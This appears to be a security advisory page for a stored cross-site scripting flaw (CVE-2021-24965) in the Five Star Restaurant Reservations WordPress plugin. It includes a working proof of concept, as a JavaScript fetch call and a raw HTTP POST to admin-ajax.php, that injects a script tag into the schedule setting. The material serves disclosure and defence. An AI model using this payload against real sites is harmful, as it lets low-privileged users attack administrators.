Lucene search
Krzysztof ZającWPEX-ID:306ECF09-FDF0-449C-930C-9DFA58F0EFC2HistoryDec 21, 2021 - 12:00 a.m.
Five Star Restaurant Reservations < 2.4.8 - Subscriber+ Stored Cross-Site Scripting
2021-12-2100:00:00
Krzysztof Zając
80
0.001 Low
EPSS
Percentile
24.8%
The plugin does not have capability and CSRF checks in the rtb_welcome_set_schedule AJAX action, allowing any authenticated users to call it. Due to the lack of sanitisation and escaping, users with a role as low as subscriber could perform Cross-Site Scripting attacks against logged in admins
As a subscriber:
fetch("https://example.com/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"body": new URLSearchParams({"action":"rtb_welcome_set_schedule", "schedule_open": '{"\\"><script>if (!window.alreadyExploited) alert(1); window.alreadyExploited = 1;</script>": {"weekdays":{"wednesday":"1"},"time":{"start":"1:45 AM","end":""}}}'}),
"method": "POST",
"credentials": "include"
})
POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
content-type: application/x-www-form-urlencoded
Content-Length: 316
Connection: close
Cookie: [any authenticated user]
action=rtb_welcome_set_schedule&schedule_open=%7B%22%5C%22%3E%3Cscript%3Eif+%28%21window.alreadyExploited%29+alert%28%2FXSS%2F%29%3B+window.alreadyExploited+%3D+1%3B%3C%2Fscript%3E%22%3A+%7B%22weekdays%22%3A%7B%22wednesday%22%3A%221%22%7D%2C%22time%22%3A%7B%22start%22%3A%221%3A45+AM%22%2C%22end%22%3A%22%22%7D%7D%7D
Then the XSS will be triggered in the plugin's settings: https://example.com/wp-admin/admin.php?page=rtb-settingsRelated
cve
cve
CVE-2021-24965
2022-01-24 08:15:08
wpvulndb
wpvulndb
nvd
nvd
CVE-2021-24965
2022-01-24 08:15:08
patchstack
patchstack
cvelist
cvelist
prion
prion
Cross site scripting
2022-01-24 08:15:00
cnvd
cnvd